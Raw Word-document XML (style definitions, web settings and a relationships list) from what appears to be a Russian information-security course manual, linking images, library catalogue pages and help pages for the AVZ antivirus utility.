    <w:link w:val="123"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="300" w:line="206" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="131">
    <w:name w:val="Основной текст (13)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="130"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="180" w:line="182" w:lineRule="exact"/>
      <w:ind w:hanging="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1e">
    <w:name w:val="Подпись к картинке1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="aff3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="191">
    <w:name w:val="Основной текст (19)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="190"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:line="197" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="201">
    <w:name w:val="Основной текст (20)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="200"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="180" w:line="197" w:lineRule="exact"/>
      <w:ind w:hanging="700"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="2110">
    <w:name w:val="Основной текст (21)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="212"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="atLeast"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="2210">
    <w:name w:val="Основной текст (22)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="223"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="120" w:line="240" w:lineRule="atLeast"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5310">
    <w:name w:val="Заголовок №5 (3)1"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="532"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="420" w:after="120" w:line="240" w:lineRule="atLeast"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Microsoft Sans Serif" w:hAnsi="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="341">
    <w:name w:val="Основной текст (34)"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="340"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="120" w:line="230" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="351">
    <w:name w:val="Основной текст (35)"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="350"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:line="259" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="t">
    <w:name w:val="t"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="proclabel">
    <w:name w:val="proclabel"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="glossarydef">
    <w:name w:val="glossarydef"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="texample">
    <w:name w:val="texample"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="90">
    <w:name w:val="Основной текст9"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="420" w:after="120" w:line="0" w:lineRule="atLeast"/>
      <w:ind w:hanging="420"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af8">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="aff5"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff5">
    <w:name w:val="Заголовок Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af8"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="002C1237"/>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084370">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="192991921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89.emf"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.jpeg"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://znanium.com/catalog/product/549989" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_executesyscheck.htm" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpeg"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-13.jpg" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.jpeg"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.jpeg"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.jpeg"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-22.jpg" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-33.jpg" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.jpeg"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://z-oleg.com/secur/avz_doc/t_infected.htm" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://znanium.com/catalog/product/945331" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-8.jpg" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.jpeg"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-2.jpg" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-15.jpg" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-28.jpg" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.jpeg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.jpeg"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject5.bin"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_deletefile.htm" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/14/5-4.jpg" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://znanium.com/catalog/product/945331" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.auteltech.com/" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-1.jpg" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpeg"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-24.jpg" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-31.jpg" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-8.jpg" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.jpeg"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.jpeg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://z-oleg.com/secur/avz_doc/avzpm_about.htm" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-40.jpg" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.jpeg"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://znanium.com/catalog/product/508381" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_executesysclean.htm" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpeg"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-19.jpg" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.jpeg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-17.jpg" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.jpeg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.jpeg"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-34.jpg" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.jpeg"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://znanium.com/catalog/product/508381" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpeg"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.jpeg"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.jpeg"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://z-oleg.com/secur/avz_doc/" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpeg"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-14.jpg" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.jpeg"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.jpeg"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-9.jpg" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-23.jpg" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-29.jpg" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-41.jpg" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpe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hyperlink" Target="http://znanium.com/catalog/product/537054" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://masiv.info/index.php?a=3&amp;c=3" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_syscleanaddfile.htm" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-9.jpg" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.jpeg"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-3.jpg" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.jpeg"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.jpeg"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.jpeg"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/14/5-5.jpg" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://znanium.com/catalog/product/537054" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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49.jpeg"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.jpeg"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject4.bin"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_deletefile.htm" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.jpeg"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-17.jpg" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.jpeg"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpeg"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-2.jpg" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.jpeg"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-25.jpg" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.jpeg"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.jpeg"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-32.jpg" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.jpeg"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-18.jpg" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-21.jpg" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.jpeg"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-32.jpg" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.jpeg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.emf"/><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media/image39.jpeg"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file:///Y:\4_complate\&#1073;&#1072;&#1082;&#1072;&#1083;&#1072;&#1074;&#1088;&#1099;\+&#1048;&#1085;&#1092;&#1086;&#1088;&#1084;&#1072;&#1094;&#1080;&#1086;&#1085;&#1085;&#1072;&#1103;%20&#1073;&#1077;&#1079;&#1086;&#1087;&#1072;&#1089;&#1085;&#1086;&#1089;&#1090;&#1100;(&#1051;&#1102;&#1083;&#1103;)\course\resources\CoursePreview\lab.files\image066.gif" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpeg"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mk:@MSITStore:C:\Users\&#1040;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1072;&#1090;&#1086;&#1088;.DNAPC\Desktop\avz4\avz_ru.chm::/script_filenamemacros.htm" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/11/2-12.jpg" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://www.intuit.ru/department/security/antiviruskasp/12/3-42.jpg" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 